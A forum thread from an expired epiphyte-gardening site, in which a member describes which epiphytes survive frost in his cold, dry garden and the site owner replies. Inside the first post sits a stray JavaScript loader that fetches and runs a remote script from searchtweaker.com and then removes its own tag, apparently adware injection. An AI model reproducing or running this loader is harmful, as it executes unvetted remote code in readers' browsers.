Oops! This site has expired. If you are the site owner, please renew your premium subscription or contact support.

Epiphyte tree

Epiphytes growing in trees of subtropical style garden plus photos of garden flora and fauna.

Forums

Forum Home > General Discussion > Going deeper into Epiphyte cultivation.

Pierre

As I told when introducing myself, I'm an old gardener but recently interested in Epiphytes.

My climate is less than very favourable for that : too dry and a bit too cold ( zone 9).

I used the canopee effect of camphor trees and hang pots on a dead trunk.

Some plants have already withstood bad Winters ( Asplenium antiguum, Epiphyllum, Bilbergia nutans and an hybrid,, a polypodium, and our native fern Dryopteris felis mas).

Last Spring I also tried on a cork board, Platycerium bifurcatum which withstood two times a quick -3°C. I think I'm fixing a new Platycerium directly on a trunk and shelter it if necessary, because it is so exotic for me.

I wonder how to show you some pictures, directly from my files ?

I had to catch it from a plant Forum where it was already published.

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

--

January 17, 2014 at 5:32 AM Flag Quote & Reply

epitree
Site Owner

Thanks for posting Pierre. It is great to learn of other epiphyte growers experiences in different climatic conditions around the world. You are blazing a trail that I am sure many will follow in the future as your experiments in epiphyte hardiness will inspire others to grow the ones that are proven to be hardy in your climate.

I apologise for the fact that this forum is not set up for posting pictures. Please post your photos to the members garden pics album as I (and other members) would be very interested to see them.

January 17, 2014 at 2:20 PM Flag Quote & Reply

Pierre

I'll post new pictures to the members garden pics album.

--

January 22, 2014 at 8:26 AM Flag Quote & Reply

Pierre

I've tried more epiphytes.

Amongst them Platycerium bifurcatum looks like a winner and so do some Bromeliads..

I've even tried Aglaomorpha coronans, but minus 2 is probably its limit without damages.

A pity no more exchanges are done there;

Regards.

Pierre

--

August 23, 2015 at 2:41 AM Flag Quote & Reply

epitree
Site Owner

Hi Pierre good to hear you are having some succeses.  It is a struggle to grow epiphytes in colder areas.

Maurice.

August 30, 2015 at 12:49 AM Flag Quote & Reply

You must login to post.